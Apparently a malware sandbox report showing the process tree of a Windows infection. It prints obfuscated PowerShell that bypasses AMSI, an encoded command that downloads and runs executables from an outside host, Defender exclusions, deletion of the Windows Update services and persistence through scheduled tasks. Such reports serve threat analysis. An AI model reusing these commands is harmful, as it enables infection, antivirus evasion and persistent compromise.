$EwfieYKsAXF.CreateType();}$RyqgUXoDEYAxx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+'m'+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+''+[Char](111)+''+'s'+'o'+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+''+'n'+''+'3'+'2.'+[Char](85)+'ns'+[Char](97)+''+[Char](102)+'e'+[Char](82)+'y'+[Char](113)+''+[Char](103)+''+[Char](85)+''+[Char](88)+''+[Char](111)+''+[Char](68)+''+[Char](69)+'Y'+[Char](65)+'x'+'x'+'');$UJGIUoCkigcZvQ=$RyqgUXoDEYAxx.GetMethod(''+[Char](85)+''+'J'+'G'+'I'+'Uo'+[Char](67)+'k'+[Char](105)+'g'+[Char](99)+''+[Char](90)+''+'v'+''+'Q'+'',[Reflection.BindingFlags]''+'P'+'u'+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HFjqbHepdIFClSNZyKy=MyfbqrCXrmwZ @([String])([IntPtr]);$jZaGTnTxzsfqxMRTDVbYUp=MyfbqrCXrmwZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jGHFxYLAhGj=$RyqgUXoDEYAxx.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+'3'+'2.'+[Char](100)+''+'l'+'l')));$cpogCnenPGAVnv=$UJGIUoCkigcZvQ.Invoke($Null,@([Object]$jGHFxYLAhGj,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+'r'+'a'+'r'+[Char](121)+''+'A'+'')));$cNBTrGBuAoTtVSJWM=$UJGIUoCkigcZvQ.Invoke($Null,@([Object]$jGHFxYLAhGj,[Object]('V'+[Char](105)+'rtu'+[Char](97)+'l'+[Char](80)+''+'r'+''+'o'+''+'t'+''+'e'+''+[Char](99)+'t')));$xznOSyH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cpogCnenPGAVnv,$HFjqbHepdIFClSNZyKy).Invoke('am'+'s'+''+[Char](105)+''+[Char](46)+'dl'+'l'+'');$bLdYgJzRIvrYoWjXl=$UJGIUoCkigcZvQ.Invoke($Null,@([Object]$xznOSyH,[Object]('Am'+[Char](115)+''+[Char](105)+''+'S'+'c'+[Char](97)+'n'+[Char](66)+''+'u'+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$EagibRwlVK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cNBTrGBuAoTtVSJWM,$jZaGTnTxzsfqxMRTDVbYUp).Invoke($bLdYgJzRIvrYoWjXl,[uint32]8,4,[ref]$EagibRwlVK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$bLdYgJzRIvrYoWjXl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cNBTrGBuAoTtVSJWM,$jZaGTnTxzsfqxMRTDVbYUp).Invoke($bLdYgJzRIvrYoWjXl,[uint32]8,0x20,[ref]$EagibRwlVK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'T'+'W'+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](101)+'rs'+[Char](116)+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4676 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1260
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:jnyXNorqFmFo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CxeoJMEHZsuTXm,[Parameter(Position=1)][Type]$GaiTtMjAHz)$SxBlOKdvzlW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+'e'+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+'mo'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+'T'+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+''+','+''+[Char](80)+''+'u'+''+'b'+''+'l'+'i'+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+'d'+[Char](44)+'A'+[Char](110)+''+'s'+'i'+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+',Au'+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$SxBlOKdvzlW.DefineConstructor(''+'R'+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+'a'+''+'m'+''+[Char](101)+','+[Char](72)+'id'+[Char](101)+''+'B'+'yS'+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$CxeoJMEHZsuTXm).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+'age'+[Char](100)+'');$SxBlOKdvzlW.DefineMethod(''+'I'+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+'li'+[Char](99)+''+[Char](44)+'H'+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+'g'+''+[Char](44)+''+[Char](78)+''+'e'+'wS'+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$GaiTtMjAHz,$CxeoJMEHZsuTXm).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+','+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $SxBlOKdvzlW.CreateType();}$SVGvDMWwBhPmm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+'m'+''+'.'+''+[Char](100)+'ll')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+'s'+'o'+''+[Char](102)+''+'t'+''+'.'+'W'+'i'+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'S'+''+[Char](86)+''+'G'+''+'v'+''+[Char](68)+''+'M'+''+[Char](87)+'w'+'B'+''+'h'+'Pm'+[Char](109)+'');$biiYoPOTRzlHNf=$SVGvDMWwBhPmm.GetMethod(''+[Char](98)+''+'i'+''+'i'+''+'Y'+'oPOT'+'R'+''+[Char](122)+''+[Char](108)+''+'H'+'Nf',[Reflection.BindingFlags]''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+'tat'+'i'+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XNlmVKRViYXqPLPwQzV=jnyXNorqFmFo @([String])([IntPtr]);$fIQJMkuvtTFRbURhYElxAe=jnyXNorqFmFo @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MgiNMlfaNjy=$SVGvDMWwBhPmm.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+'a'+'n'+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+'n'+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+'.d'+[Char](108)+''+'l'+'')));$QyautjAwlxElqZ=$biiYoPOTRzlHNf.Invoke($Null,@([Object]$MgiNMlfaNjy,[Object]('L'+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+[Char](98)+'r'+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$bUotXLQPVcSutqkkD=$biiYoPOTRzlHNf.Invoke($Null,@([Object]$MgiNMlfaNjy,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+'l'+''+[Char](80)+''+'r'+''+[Char](111)+'te'+'c'+'t')));$EsJrIny=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QyautjAwlxElqZ,$XNlmVKRViYXqPLPwQzV).Invoke(''+[Char](97)+''+[Char](109)+'si.'+'d'+''+'l'+''+'l'+'');$HcToesCIouSvsWAcb=$biiYoPOTRzlHNf.Invoke($Null,@([Object]$EsJrIny,[Object](''+'A'+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+'er')));$bznzqYzMhj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bUotXLQPVcSutqkkD,$fIQJMkuvtTFRbURhYElxAe).Invoke($HcToesCIouSvsWAcb,[uint32]8,4,[ref]$bznzqYzMhj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HcToesCIouSvsWAcb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bUotXLQPVcSutqkkD,$fIQJMkuvtTFRbURhYElxAe).Invoke($HcToesCIouSvsWAcb,[uint32]8,0x20,[ref]$bznzqYzMhj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('di'+[Char](97)+''+'l'+''+'e'+''+'r'+'sta'+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2252
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
PID:1892
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1036
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2096
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2776
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:2688
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3284
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3284 -s 7642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3600
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3032
-
C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
PID:3096
-
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 2846⤵
- Program crash
PID:2728
-
-
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3296 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
- Creates scheduled task(s)
PID:3756 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3340
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3316
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 2523⤵
- Program crash
PID:2360
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4164
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1124
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1412
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4932
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3476
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4864
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4124
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:548
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:4820
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4632
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:3432
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:1940
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2692
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2112
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵PID:2340
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4600
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:460
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4072
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:4304
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4204
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4204 -s 8362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4696
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3736
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1984
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1864
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1856
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1772
-
